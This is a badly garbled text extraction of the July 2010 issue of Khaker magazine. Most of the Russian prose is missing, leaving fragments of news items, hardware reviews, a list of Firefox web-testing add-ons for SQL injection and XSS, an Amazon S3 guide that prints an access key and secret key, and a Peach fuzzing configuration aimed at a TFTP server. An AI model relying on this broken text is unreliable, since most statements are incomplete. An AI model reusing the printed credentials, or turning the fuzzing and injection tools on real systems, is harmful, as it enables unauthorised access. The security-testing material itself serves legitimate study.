Хакер 2010 07 PDF

.
110
x 07 () 2010
.
210
:

WEB-
07 (138) 2010
AMAZON S3

. 26

. 52
138
LOTUS DOMINO
SKYPE

. 107
INTRO
CENSORED
-
. ,
Google,
e-mail ,
,
.
,
, ,
,
.

:

.
,
, ,
, ,
e-mail ICQ

.

. ,
VPN,

,
.
,
.
, ! :)
nikitozz, . .
udalite.livejournal.com
MegaNews
004
084
FERRUM
016
32
020
Intel

Samsung ML-1660
PC_ZONE
022
026
031
032
038
Firefox-
Mozilla
Amazon S3
10 reverse-engineering
, ,
, ,
042
Easy-Hack
046
052
058
064
068
071
076
C,
090
096
100
Qubes OS
Linux,

Linux
-x86 - Linux
104
107
110
114
Windows
C++
SYN/ACK
116
120
D-link 500T

Hyena 8.0

Cisco Systems Juniper Networks
124
...
129
ProcFS Web-
Lotus Domino
, mod_rewrite
ProcFS
- 134
ROP,
X-Tools
140
MALWARE
143
078
144
082
Skype

: AVG, AVIRA AVAST?
DrWeb
Windows *nix
nginx Web-
PSYCHO:
!
FAQ UNITED
FAQ
8.5
WWW2
web-
052
D-link 500T
078

: AVG, AVIRA AVAST?
058
104
Lotus Domino
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)
/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
Windows
> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
(goryacheva@gameland.ru)
>

> Gameland TV

>
(strekneva@gameland.ru)
>

>

>
(ashomko@gameland.ru)
> -

>

(korenfeld@gameland.ru)
>

>
(andrey@gameland.ru)
>
(devald@gameland.ru)
>
(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.

.
.

:
content@gameland.ru
, , 2010
MEGANEWS
MIFRILL
MARIA.NEFEDOVA@GLC.RU
MEGANEWS

Google, ,
, , .
, Google Street View
Google
Streets. , -
. ,
Street View SSID MAC- Wi-Fi-, ,
. - : ,
Wi-Fi-,
,
Wi-Fi-.
Google, ,
. , , ,
Google. - :
. ,
.
.
, Google .
-, . -, (
, 5 ).
? Google ,
.
.
2010 ANDROID OS 28% ,

IPHONE OS 21%
PALM
, ,
Palm, , HP $1,2 .,
$5,70 . , , , ,
HP , Palm . HP ,
Palm webOS.
,
iPad, HP Slate, , Windows 7,
, webOS. , ,
webOS : HP
,
. HP Google
(Matias Duarte), Palm - , webOS.
UI- Android.
004
X 07 /138/ 10
MEGANEWS
IMAGINE CUP 2010

3 8 IT- Microsoft
Imagine Cup.
: ( Software design) (Embedded development).
,
, -,
. ,
www.imaginecup.
com, www.microsoft.com/rus/imaginecup. !
2009 -
59,7 .
,

, 1-2 , , , . , Seagate
-
: , ,

3 .
, ,

, ,
, . ,

LBA, 2,1
.
Long LBA, ,
, 64-
Win 7 Vista , Windows
XP 2,1 .

,
Theora H.264
,
.
,
.
Google,
Google I/O
WebM,
VP8, Vorbis -
Matroska. , Google On2 ,

VP3 VP8 ( ), .
, WebM , , ,

. WebM
Chromium,
Opera, Firefox (
www.webmproject.org),
YouTube, HTML5
URL &webm=1.

16384x16384,
, ,
.

,
.
Wi-Fi
,
,
.
Kindle, ,
, Barnes & Noble
Nook. ,
Android , Read
006
In Store - . Amazon

Kindle,
Facebook Twitter, PDF
.
,
Nook. ,
Barnes & Noble
Android, ,
: E-ink
.
X 07 /138/ 10
MEGANEWS

LG W2363D,
3D. 23- Full HD (1920x1080), 70000:1
3 . 120- , ,
. G MODE:
Thru Mode ; RC
, ; AutoBright
; SRS Tru-surround HD
.
,
Tru-Light. Tru-Light
.
NVIDIA GeForce 3D Vision,
6000 .
17000 .
APP STORE -
BitTorrent,
- Torrent. Torrent
, ,
Apple App Store.
Torrent, Griffin.
.btapp, HTML JavaScript, . App Store
Torrent 2.2 (
). , ,
uTorrent , . , ,
, : , . , ,
.
83%

DoS-,
, . ,
- ,
,
Imperva. : Exeman
-,
300 .
GUI- (90 PHP).
DDoS .
, -
, .
,
.
008
X 07 /138/ 10
MEGANEWS

IT-. 14- CEO Summit ,
Microsoft, , MS
.
,
-, ,
. ,
DRM, ,
, .
IPAD
200 000 ,

MAC
180 000
ANDROID
GOOGLE
,
.
- CyberBunker
50- . , CyberBunker
7 .
Columbia Pictures, Disney Enterprises, Paramount
Pictures, Twentieth Century Fox, Universal Warner Bros
- .
6 2010 , CyberBunker The Pirate Bay .
, CB3ROB,
, , CyberBunker ,
. , TPB , , ,
. ,
TPB !
, ,
: ,
TPB , The
Pirate Bay .
? WHOYOUGLE!
-
, . Rambler ,
WhoYOUgle (, ).
, , , ,
. ?
http://whoyougle.ru, 1- 2009
. WhoYOUgle ,
( dolboeb).
WhoYOUgle
,

010
100 940 --
.
.
X 07 /138/ 10
MEGANEWS

,
,

mp3- .

,
,
- .

,
. - ,
, , ,
, ,
.

,
(
, )
0,5% . , , ,
, -
. .
$20 WI-FI

Wi-Fi .
, , Wifi Box
(wifi-box.com),
20-30 .
Made in China:
, USB- Wi-Fi,
Linux, Backtrack.
,
WEP/WPA . , kismet aircrack GUI-
Spoonwep Spoonwpa. ,
, ,
.
Backtrack , Wi-Fi
- dealextreme.com. - RTL8187L. ,
.
$20 .
, : ,
. ,
nag.ru lan23.ru.
RAPIDSHARE WINS!
20

USENET-.
1979
30
012
,

-

. RapidShare
,
,

.

RapidShare

.

,
, RapidShare .

RAR. - .
, Google top-1000
. Rapidshare
40- !
X 07 /138/ 10
,

-, ,
. -, ,
,
( Coding). , , Gsou
, , . - D30 - .
,
Skype MSN.
, , ,
, , HD, .
MANDRIVA

,
Mandriva - , . ,
, .
Mandriva Linux 2008 ,
,
Mandriva
, .
, , Mandriva , ,
.
, Mandriva
,
.
3D HD
: Sharp
3D
HD-.
,
,
, ,
- . , ,
HD (720p2),
, ( ,
), 3D-.
,
,
.
X 07 /138/ 10
013
13
MEGANEWS

Thermaltake,
, ,
, ,
! Tt eSPORTS
:
Challenger Challenger Pro.
: Challenger Pro
18 (
Challenger 12 ),
64
( 32 ),
USB 2.0 ( Challenger )
( ). ,
. ,

, :).
$55 Challenger $75
Challenger Pro.
1 300 000
GOOGLE TV
Google . Google TV,

Sony Logitech,
-. Google TV

,
-
, ( HDMI-
).
YouTube
-
Google Chrome.
Google TV ,
-,
( )
. Google
TV
.
. .
2010 LD

LD Select c . LD Select

,
, -
014
.
LD Select :
LD Select Red (10/0,8 /), 1 LD Select Blue (6/0,5
/) LD Select Silver
2 (4/0,4 /). LD Select ,
.
X 06 /137/ 10

,
. - , (MPA),
Usenet- Newzbin. , MPA, , . , ,
- Team R
Dogs, Newzbin . Mr.White , - .
DeepSharer .
, .
,
Newzbin, , Newzbin2
.
5 PAC-MAN,
GOOGLE 30-
X 06 /137/ 10
015
ASRock H55M
Pro
MSI H55-GD65
FERRUM

MSI H55-GD65
Gigabyte GAH55M-UD2H

32
HP Pavilion
dv6t
Dell Studio
1515
S H55H-CM
ASUS P7H55-M
Pro
ASUS
M4A78T-E
ASUS
INTEL M4A78T-E
32- Westmere
Intel H55/57 Express.
, , .
.
?
, Intel
H55/H57 Express, , .
Intel H57 Express
Intel Core,
i3 i7. PCI
Express (,
), DVI,
DisplayPort ( HDCP) HDMI,
SATA, RAID, USB,
, PCI Express . Intel H55 Express H57
RAID- ,
PCI Express x1 ( ).
BCLK,
MSI H55-GD65
ASRock H55M Pro
ASUS P7H55-M Pro
Palit
GeForce GT
240 Sonic
Gigabyte GA-H55M-UD2H
ECS H55H-CM
Foxconn H55MX-S
50
100
150
200
250
300

,
.
BCLK 214 (4922\23). , SuperPI
1.5XS 1M, wPrime 2.0 32M, Lavalys Everest Ultimate Edition.

, : 3.06, Intel Core i3-540
, : 2x2, Geil Black Dragon
, : 512, ATI Radeon HD 5670
, : 1.5, Seagate Barracuda
ST31500341AS
: Noctua NH-D14
, : 1000, ZALMAN ZM1000-HP
: Windows XP Professional, SP3, x32
ASUS
MSI
WINRAR
MSI H55-GD65
ASRock H55M Pro
ASUS P7H55-M Pro
Palit
GeForce GT
240 Sonic
ECS H55H-CM
Foxconn H55MX-S
win RAR 3.9
win RAR 3.9 (OC)
1000
2000
3000
WinRAR
016
X 07 /138/ 10
EVEREST:
MSI H55-GD65
Palit GeForce
GT 220 Sonic
ASUS P7H55-M Pro
Palit
GeForce GT
240 Sonic
ECS H55H-CM
MSI H55-GD65
Palit GeForce
ASRock H55M Pro
GT 220 Sonic
ASUS P7H55-M Pro
Palit
GeForce GT
ECS H55H-CM
240 Sonic
Foxconn H55MX-S
wPrime 2.00 32m (OC), c
SuperPi
1.5 XS 1m (OC), c
wPrime 2.00 32m, c
ASRock H55M Pro
10
15
20
SuperPi 1.5 XS 1m, c
Foxconn H55MX-S

5000
ASRock H55
Pro
10000
15 000
/
Everest memory copy (OC)
Everest memory write (OC)
Everest memory read (OC)

Everest memory copy
Everest memory write

Everest memory read

Everest
ASUS
P7H55-M PRO
4500 .
ASROCK
H55M PRO
3400 .
: INTEL H55 EXPRESS

: LGA 1156
, : 16, 4XDDR3, 1066 2133
: 1XIDE, 6XSATA 3 /
: 1XPCI-E X16, 1XPCI-E X1, 2XPCI
: D-SUB, DVI, HDMI, 6XUSB 2.0, SPDIF, RJ-45, PS/2
: 7.1 HDA REALTEK
: GIGABIT ETHERNET
-: 245X245 , MATX
: INTEL H55 EXPRESS

: LGA 1156
, : 16, 4X DDR3, 1066-2600+
: 5XSATA 3 /
: 1XPCI-E X16, 1XPCI-E X16 ( X4), 1XPCI-E
X1, 1XPCI
: D-SUB, DVI, HDMI, 5XUSB 2.0, ESATA/USB, FIREWIRE,
SPDIF, RJ-45, PS/2
: 7.1 HD VIA VT1718S
: GIGABIT ETHERNET
-: 244X244 , MATX
ASUS
Clarkdale, , ,
. ,
,
. . ,
206 , . ,
BIOS, Turbo V,
.
, ASRock
, ,
. , ASRock H55M Pro ,
.
ATI CrossFire X,
, , PCI-E
x1 PCI. ,
193 , , , ,
.
ASUS, ,
. , PCI Express x4, , , , ,
.

. , ,
. ,
.
X 07 /138/ 10
017
ASUS P7H55M Pro

ECS H55H-CM
FERRUM
Samsung
R580
MSI H55-GD65
GD65
Samsung
R580
MSI H55-GD65
3500 .
2900 .
ECS
H55H-CM
FOXCONN
H55MX-S
,
. 16
4 PCI-E x1
. SATA. .
, , , ,
,
.
PCI Express x4, (
),
.
: INTEL H55 EXPRESS

: LGA 1156
, : 16, 4XDDR3, 1066/1333
: 6XSATA 3 /
: D-SUB, HDMI, 6XUSB 2.0, RJ-45, 2XPS/2, LPT
: 5.1 HD REALTEK ALC662 ( 7.1 REALTEK
ALC888)
: GIGABIT ETHERNET
-: 244X244 , MATX
, ,
,
PCI Express x1 . , , : BIOS
,
BCLK,
. 160 ,
,
.
018
: INTEL H55 EXPRESS

: LGA 1156
, : 8, 2XDDR3, 1066/1333
: 6XSATA 3 /
: DVI, HDMI, 6XUSB 2.0, SPDIF, COM, RJ-45, PS/2
: 7.1 HDA REALTEK ALC888S
: GIGABIT ETHERNET
-: 244X218 , MATX

. , -
mATX, ,
, 8 .
, BIOS
,
. ,
.
X 07 /138/ 10
5ASRock H55M Pro
MSI H55-G
MSI H55-GD65
3600 .
GIGABYTE
GA-H55M-UD2H
:
: INTEL H55 EXPRESS

: LGA 1156
, : 16, 4DDR3, 800 2200+
: 1XIDE, 1XFDD, 5XSATA
: 2XPCI-E X16, 2XPCI
: D-SUB, DVI, HDMI, DISPLAYPORT, 6XUSB 2.0,
FIREWIRE, SPDIF, ESATA, RJ-45, PS/2
: 7.1 HD REALTEK ALC889
,: GIGABIT ETHERNET REALTEK RTL8111D
-: 244X230 , MATX
, , , DDR3
2133 . Intel Core i5 i7, , 1066 . ,
ATI CrossFire X,
. , Ultra
Durable 3,
.
, ,
,
165 , Gigabyte . , FPS
, .
X 07 /138/ 10
4500 .
MSI
H55-GD65
:
: INTEL H55 EXPRESS

: LGA 1156
, : 16, 4XDDR3, 1066-2133+
: 1XIDE, 7XSATA
: D-SUB, DVI, HDMI, 6XUSB 2.0, FIREWIRE, SPDIF,
ESATA, RJ-45, 1XPS/2
: 7.1 HD REALTEK ALC889
: GIGABIT ETHERNET, REALTEK 8111DL
-, : 305X225, ATX
- ATX, , ,
eSATA, ,
. , .
.
4876 ,
. ,
,
.

. , .
019
FERRUM

4490 .

SAMSUNG ML-1660

,
. , ,
.
, . . , .
Samsung ML-1660,
. . . .
020
X 07 /138/ 10

, dpi: 1200x600
, \: 16
, : 8
, : 150
, : 321x224x181
, : 4.2

,
:
, , .
, .
10
.
, ,
, .
, ,
. Samsung ML-1660
. , ,
. .
,
,
, .
, , . , ,
. ,
, ,
, , ,
, .
, . ,
- .
, , Samsung ML-1660
,
. . \
: , ,
, (
),
.
X 07 /138/ 10
,
. , , ,
,
. , !
Samsung AnyWeb Print,
.
.
- ,
Print!
, ,
.
, Samsung ML-1660 , , . ? -
. 10
45,6 ,
8 ,
.
, ,
, .
,
, , - ,
. ,
,
. .
,
.
ML-1660, - , , .
Samsung
.
, ,
, . ,
.
. z
021
PC_ZONE
Step step@glc.ru
FIREFOX-

Mozilla
, Firefox' . : , -, .
,
, .
,
: ,
.
x-toolz

. ,
HTTP-, ,
User-Agent, fingerprinting ,
,
. .
FINGERPRINTING' FIREFOX'

: , , .
,
,
. CMS/
/, -
022
, , . ,
,
.
. , <meta
name="generator" content="WordPress 2.8.4"
/> ,
Wordpress'.
,

Wappalyzer. , ,
, ,

. .
Wappalyzer
,
, , -, .
JS-
( Google
Analytics).
,
.
ShowIP
, IP-
, ,
whois.
HTTP-
,
, ,
. HTTP/HTTPS-
-, Fiddler'.
, ,
X 07 /138/ 10
Wappalyzer
HTTP-
, .
HttpFox Live
HTTP Headers.

HTTP-,
, ,
POST- .. ,

. : Modify Headers
, , ,
.
User Agent ,
, HTTP- ,
. ,
, User Agent Switcher,
.
Tamper Data
,
.
, POST-.
,
GET,
URL,

. POST
,
, , . , Tamper Data
VisualHack'.
,
. ,

X 07 /138/ 10
. ,
GET- POST-
Fireforce. ,
,
, ,
, .
,
?
FuzzyFox .
, - .
, ,
,
.
,
. , , Firefox
cookies,
( ). , Add N Edit Cookies,

. ,
,
, Allcookies
.

CookieSwap. ,

,
. , ,
,
Google ,
, Gmail.
JS-
Gmail, Facebook
-,
JavaScript.
, , , . ,
Firefox
Javascript Firebug.

JS , ,
JS-. Firebug

, , .
if-breakpoint',
.
,
, .

?
Firefox ,
. , -
, . Firefox'
: ,
3.5, 3.6.3 .
, ? Nightly
Tester Tools.
- ,
.
023
PC_ZONE
POST-
User
Agent
, ;
watch'. ,
- ,

. Firebug Firefox

JS-, HTML-,
CSS .
Inspect,
,
Firebug ,
.

,

View Dependencies.
, , JS/CSS-.
(-,
JS- JS- )
, , .

, , -,
( JavaScript), , -,

.
024
, ,
. ,
JavaScript
Deobfuscator.
, JS-
,
, ( ) .
Tools
,
/.
, XSS,

XSS-, SQL
,
Firefox' HackBar. ,

,
. HackBar
, ,

. SQL-,
SQL Injection. ,
SQL-,
, ,

.
SQL Inject Me, security- Seccom
SQL-

Labs. ,
,
( ) ,
.
.
XSS XSS Me. HTML-,

,
XSS-. HTML-
JS- (document.vulnerable=true),

XSS.
FLASH-
Flash, .
SWF- , -
.
Flashbug, Firebug' SWF-,
. Firebug' ,
, AMF-, , ( , )
Flash ActionScript.
X 07 /138/ 10
Firebug
JS-

FireFlash
ActionScript , ,
, XML Flash-, Firebug console.
,
,
SWF-, , . Firebug,
Firefox , .
,
.
.
,
IP. ,
, IP:
Google Voice, Pandora Radio ..
. ,
,
, FoxyProxy.
,
,
.
,
. , , ,
, . Tor, Firefox'
Torbutton,
.
,
FireGPG.
, , , Gmail,
GnuPG.
Tracking-,
(,
X 07 /138/ 10
). ,
,
.
Flash-cookies,
LSO- (Local Shared Objects) - ,
, ,
.
? Tracking-
BetterPrivacy.

NoScript. .
, ,
XSS Clickjacking :). ,
JS, Java Flash
, .
Firekeeper,
IDS- Snort.
DVD
dvd

DVD-.
][-

,
.
,
(,
) , ,
,
. Greasemonkey, . ,
, ,
-
.

userscripts.org.
.
,
. iMacros, TestGen4Web,
Chickenfoot.
? ,
025
PC_ZONE
Step step@glc.ru
Amazon S3

.
. . , .

Twitter .
.

-
,

-
s3.amazonaws.com.
, Amazon
S3. :
,

026
Dropbox (www.dropbox.com) ,

, Amazon S3? , , !
,

, 99.9%
.
.
.

,
, . ?
flickr .
, -
,
. .
, ,
?
,
X 07 /138/ 10

bucket' .
.
.
S3Fox
,
.
,
, ,
?
, DVD,
:
. ,
,
,
Amazon S3. .
S3?
Amazon S3 Amazon
Simple Storage Server
Amazon. ,
.
,
?, , .
.
. (,
SCSI).
. ,

, ...
.
-,
, 10
36.6-. , , ,
-
. ,
, ,
.
Amazon S3.
, . 10 , 1
5000
(,
5 ). Amazon ,
.
, - , ,
X 07 /138/ 10
Google
, . , Amazon S3
. .
, S3
,
. ,
S3
,
. ,
.
? :
99.99% ;
99.999999999% .
, . , , Amazon
S3. .
, .
, Amazon S3 ,
, .
,
.
(
- ) , .
Amazon :
, . 50
$0.150. 4.5
! ,
( ),

($0.01 1000 ). ,
,
(calculator.s3.amazonaws.com/calc5.
html). ,
Access Key ID Secret Access

Key S3-
Amazon S3 (

), .
20 , 5 ,
(
5 ). PUT/COPY/POST/
LIST 5 ,
GET. ,
Add to bill .
,
,
99.99% , $3.66
, 100 .

. ,

: S3
,
cloud-storage . ,
,
,
,
S3. ,
,
! .

Reduced Redundancy
Storage (RRS).
S3,

. , , ,
- -
027
PC_ZONE
. ,

.

400 (!) ,
. (
),
. ,
Amazon S3 , ,
.
:

, ,
.

, . ,
, :
Sing up for Amazon S3
aws.amazon.
com/s3.
- - Amazon ( ,
, Radar-
, ),
.
. ,
Amazon' , S3,
Amazon Web Service (AWC).
, ,
. ,
, , Visa
Mastercard. : ,
: Webmoney, .
. ,
.
:
,
. : ,
(
,
cvv2- ).
Visa Virtuon 200
,
, . ,
Visa ,
:). Amazon
,
,
.
: , ?.
.
,

. .

028

,
.
.
,
, S3
,
. Amazon .
: ,
FTP- SSH-
. Amazon S3
key-based .
, ,
, , .

bucket' S3,

.
, . , scanner.zip
xtoolz,
S3 xtoolz/
scanner.zip.
, bucket'. Bucket

Amazon S3,
.
bucket
Amazon S3,
bucket' . , xtoolz/scanner.zip
bucket' xakep, , URL http://xakep.s3.amazonaws.
com/xtoolz/scanner.zip.
bucket' ,
.

,

bucket'. ,
http://xakep.s3.amazonaws.com/xtoolz/scanner.
zip,
All.
REST SOAP,
( ).
: bucket,
(
bucket), (
HTTP BitTorrent ),
, (
,
).
,
. S3
, .
, ,
,

.
bucket'
, , ?
.
Firefox S3Fox (addons.mozilla.org/en-US/
firefox/addon/3247):
.
,

. email Amazon
. S3
, .

Access Key ID Secret Access Key (
X 07 /138/ 10
INFO
info

Amazon S3

Dropbox
. 2

,
5 ,

.
CloudBerry Explorer
). ,
Security Credentials,

(aws.amazon.com/account). :
. ,

. , Amazon S3 , , .
, ,
... .
RRS, .
,
CloudBerry Explorer (cloudberrylab.com).
Access Key ID: AKIAIEAXASBKAUVBX3DQ

Secret Access Key: 6Xr1nEFZ5jWVtPc7wU6AubHe
bTW54Ue0dWV4dCa0
, S3Fox,
, , . S3Fox,
:
, .
, , bucket.
.
bucket
,
.
, URL ,
URL
. . ,
.
, .
- Copy URL (http://xakep.
s3.amazonaws.com/xtoolz/scanner.zip). :
AccessDeniedAccess Denied31D32B892AF10B41tDO
SXPdDmixz7CkanMA1GoYbaBhgcTjQy8l93OqTNsXXJqm
j3snzF2fOdlAQJvQ9
. (Edit ACL)
. S3Fox

X 07 /138/ 10
HTTP://WWW
links

Amazon S3:
www.s3fm.com
, . S3-.
-, :
Amazon S3,
. -, ,
( S3Fox
!). ,
: ,
,
S3.
-, CloudBerry Explorer
bucket' Amazon S3.
,
. ,
( S3Fox, ).
-,
Amazon S3.
ACL- . , , BitTorrent (
generate bittorent url).
Torrent'.
Amazon S3, ,
029
PC_ZONE
.torrent-
,
, : s3cmd --configure.
, , .
. , s3cmd
rsync,
:
s3cmd --acl-private --bucketlocation=EU --guess-mime-type
--delete-removed sync /local/
backup/ s3://xakep/backupfromserv1
S3-
.
,
. ,

,
. :
CloudBerry Explorer . ,
,
. ,
$40, . -,
, Amazon S3.
, -,
Powershell-
.
c:\
workdata bucket xakep,
,
(2010_06_01
):
$new_folder_format = Get-Date
-uformat "%Y_%m_%d"
$s3 = Get-CloudS3Connection -Key
$key -Secret $secret
$destination = $s3 | SelectCloudFolder -path "xakep" | AddCloudFolder $new_folder_format
$src = Get-
030
CloudFilesystemConnection |
Select-CloudFolder -path "c:\
workdata\"
$src | Copy-CloudItem $destination
-filter "*"
.
,
S3 . CloudBerry Explorer
, ,
, CloudBerry
Online Backup.
S3 Backup (www.maluke.com/software/
s3-backup), , .

,
.
S3
5 . , ,
.
S3 LINUX
,
.
s3- s3cmd
(s3tools.org/s3cmd). Ubuntu
, : apt-get
install s3cmd.
, , -
--acl-private ,
.
--bucket-location=EU
( ,
). --guess-mime-type
, MIME-
,
.
S3-, ,
--delete-removed. , .
,
? :
s3cmdsyncs3://xakep/
backupfromserv1/local/backup/
,
bucket', ls:
s3cmd ls s3://xakep
, bucket xakep
. ,
s3tools:
s3cmd --acl-private --bucketlocation=EU mb s3://xakep
cron
,
. ,
?
, . z
X 07 /138/ 10
PC_ZONE
STEP TWITTER.COM/STEPAH
10 REVERSE-ENGINEERING
, ,
, W32Dasm.
, . 2000 , W32Dasm
Turbo Debugger .
, .
SOFTICE. ,
,
, SoftICE.
, NuMega,
, , . ,
, OllyDbg (www.ollydbg.de) WinDbg (www.
microsoft.com). , ,
SoftICE ,
, .
: 2000-
UNICODE
.
OllyDbg
, , ,
UNICODE 2.0
, -.

.
if-else
. ,

, .
,
,
.

IDA Pro 4.17 ( 2001 ), , 5.0,
.
X 07 /138/ 10
PYTHON' . , 2000
,
. Python SWIG , Python
Python' API.
IDAPython (d-dome.net/idapython)
IDA Pro,
IDA API Python.
PyDbg (pedram.redhive.com/PyDbg)
pefile (code.google.com/p/pefile).
Python -
, , IDA Pro
Immunity Debugger BinNavi,
Python.
.
-
:
,
- , .
,
.

- BinDiff (www.
immunitysec.com/products-bindiff.shtml).
,
: ,
,
A
B,

.
.
2000- ,
. 2007
IDA Pro Hex-Rays (www.hex-rays.com),
, -,
.

ARM,

.
.

,
.

,
.
CollabREate
(www.idabook.com/collabreate) IDA
Pro BinCrowd (bincrowd.zynamics.
com).
, SaaS,

, ,
.
?
. 2020
,
, :). z
031
PC_ZONE
Step twitter.com/stepah
,
,
,
,
CanSecWest PWN2OWN
.
. , , .
-,
.
Fuzzing 1988
The Fuzz Generator,
.

, ,
.

.
: ,
,
032
, ,
-
.
, ActiveX- , ,
SWF-.

.
,
, -
.
, , .
, ,
. JPEG- ,
:
?. , ,
,
, .
, ,
X 07 /138/ 10
miniFuzz dumb-
Microsoft
Adobe Reader 9.2.0 ,

Charlie Miller
.
,

. ,

:
JPEG-, .
, ,
.
, ,
,
. ,
,
, .
,
:
(dump)
.
, ,

,
.
(smart)
.
, ,
, , , .
, , ,
.
,

SDL (Security Development Lifecycle),
Microsoft
,
fuzz-. Minifuzz
; , ,
(, winword.exe test_sample.
doc).

,
Template files,

MiniFuzz (www.microsoft.
com). Microsoft
.
X 07 /138/ 10
033
PC_ZONE

PeachPit
,
.
Start Fuzzing,
,
( Aggressiveness)
.
( 2 ), ,
.
,
.
(!), ,
-, -,
, , -, crash-
.
Minifuzz Visual Studio,
fuzz-
Tools
MiniFuzz. , - MiniFuzz ,
dumb FileFuzz (labs.idefense.com/
software/fuzzing.php),
Microsoft, security-
iDefense Labs.
MiniFuzz (
) dump-,
Peach (peachfuzzer.com, ),
smart,
, .

034
,
.

PeachPit ( ) XML-,
, ,
.
Minifuzz, Peach
, , RPC,
COM/DCOM, SQL-
. ,
.
: ,
,
. ,
Peach ,
, . WinDBG
,
Wireshark Winpcap,

.
Peach'
PeachPit. ,
XML- ,
,
, .

Visual Studio, PeachPit',
.
-
.
,
- template.xml,
.
PeachPit' .
,
( , ..),
.
TFTP
(Read).
RFC, :
TFTP PACKET
---------------------------------| \x00\x01 | Filename | 0 | Mode
| 0 |
----------------------------------
, HEX \x00\x01,

. Filename
Mode . ,
,
Filename.
PeachPit' RFC:
<DataModel name="tftprrx">
<Blob name="opcode"
valueType="hex" value="00 01"
token="true"/>
<String name="filename"
value="filename.txt"
nullTerminated="true"/>
<String name="mode"
value="NETASCII" token="true"
X 07 /138/ 10
Peach
nullTerminated="true"/>
</DataModel>
,
.
token="true"
, Peach,
, . ,
,
filename, ,

(, , ).
, . filename mode
nullTerminated, ,
-. ,

(blob string).
, .
, ,
.
, ,
,
PeachPit'. ,
filename, .
Peach',
(Action type="output"),
tftprrx:
<StateModel name="state1"
initialState="Initial">
<State name="Initial">
<Action type="output">
<DataModel ref="tftprrx"/>
</Action>
X 07 /138/ 10
</State>
</StateModel>

. .
-
,
( ,
).
,
(Exploitable, Probably Exploitable, Probably Not
Exploitable, Unknown),
WinDBG !exploitable (msecdbg.codeplex.com).
, TFTPD32 UDP-,
69 (TFTP):
<Agent name="RemoteAgent" location="http://1
92.168.1.10:9000">
<Monitor class="debugger.WindowsDebugEngine">
<Param name="Service" value="TFTPD32" />
</Monitor>
<Monitor class="network.PcapMonitor">
<Param name="filter" value="udp port 69" />
</Monitor>
</Agent>
.
, ,
secuiryt- .
( filename), , . ,
.
DVD
dvd

DVD-.
WARNING
warning
.

. ,

.
035
PC_ZONE
IOCTL Fuzzer
<Test name="tftprrx">
<Agent ref="RemoteAgent"/>
<StateModel ref="state1"/>
<Publisher class="udp.Udp">
<Param name="host"
value="192.168.1.10" />
<Param name="port" value="69" />
</Publisher>
</Test>
publisher ,
.
TFTP UDP,
. ,

(Run). ,

:
<Run name="DefaultRun">
<Logger class="logger.Filesystem">
<Param name="path" value="logs"/>
</Logger>
<Test ref="tftprrx"/>
</Run>
</Peach>
Peach'
, .
,

036
?
.
,

TFTP (, write), ,
XML- .

PeachPits' peachvalidator.pyw.
,
Peach:
peach.py -a
peach.py tftpfuzzer.xml
,
XML-.
,
,

. , , .

Ring0. ,
, (
, ) . , ,
: ,
, ,
IRP-. I/O request
packets (IRP) ,
Windows

. ,
,
. ,
,

.

IOCTL Fuzzer (code.google.
com/p/ioctlfuzzer),
fuzzing-,
IRP-.
( ,

),
NtDeviceIoControlFile,

IRP-
. , IRP-

.
IRP,
X 07 /138/ 10
. IRP-
, .
, -,

XML-,
. ,
.

.
IOCTL Fuzzer
- ,
BSOD,
:).

,
.
Microsoft,

WinDbg,
, .
VMware WinDbg
(named pipe), .
1.
VMware.
Settings Configuration Editor,
(Add), Serial Port,
Next,
Use named pipe

(\\.\pipe\com_1). This end is server. The
other end is application
Advanced, Yiled
CPU on poll ( ).
. boot.
ini ( ,
Windows XP)
, /
debugport /baudrate:
[operating systems]
multi(0)disk(0)rdisk(0)
partition(1)\WINDOWS="Microsoft
Windows XP Professional" /
fastdetect
multi(0)disk(0)rdisk(0)
partition(1)\WINDOWS="Microsoft
Windows XP Professional - Debug"
/fastdetect /debugport=com1 /
baudrate=115200

,
X 07 /138/ 10
. ,

:
windbg -b -k com:pipe,port=\\.\
pipe\com_1,resets=0
IOCTL Fuzzer
, BSOD
.
,

( ,
, ,

).
(
WinDbg F5),
,
, (crash
dump) . :
, , .
, :).
-?

web-based
,
HTTP -
-.

-,

(PDF-
).
,
Sulley (code.
google.com/p/sulley),
Blackhat' 2007 . ,
,

.

,
Peach, XML-,
Python.
SPIKE (www.immunitysec.
com/resources-freesoftware.shtml),
,
C.
ActiveX, COM-
. .
,
:

.
,
,

. z
037
PC_ZONE

-, , :
, - HTTPS, - IM-. .
: ,
- ? ,
.
GMAIL

The Bat!,
.
PGP
.
, , Gmail
-,
,
038
. , Google :

HTTPS , ,
. ,
Browser connection
Always use https. ,
, -
Wi-Fi,
Gmail ,
, PGP/GPG.
-, Firefox',

FireGPG (ru.getfiregpg.org/s/install). ,
PGP
: (private)
(public), , X 07 /138/ 10
Firefox
,
. ,

,
, .
.
FirePGP ,
- Gmail
GnuPG,
. ,
:
Windows: gpg4win (www.gpg4win.org/
download.html);
Linux': GnuPG (www.gnupg.org/download/
index.en.html);
MacOS: Mac GPG (macgpg.sourceforge.net).
, ,
Firefox .
, ,
, ,
.
Gmail FirePGP Gmail, .
Gmail
. ,

PGP/GPG .
Gmail ,
,
. Gmail
-,
POP/IMAP/SMTP.
X 07 /138/ 10
, , :
PGP, ,
. ,
,
.

Jabber' (
).
ICQ? ,
, , ,
SSL. , ,
? ,
-
.
. ,

SOCKS-,

.

SOCKS-. ,
(
- : miranda, qip, pidgin
..) .
,

SOCKS-. , SimpLite
(www.secway.fr). ,
,
- ,
.
,
,
,
ICQ. OTR Off-the-Record
Messaging AES,
-
- SHA-1.

IM-
,
.
PGP .
, : .

,
AES-
Message Authentication Codes (MACs).
(

), ,
.
www.
cypherpunks.ca/otr OTR localhost AIM proxy
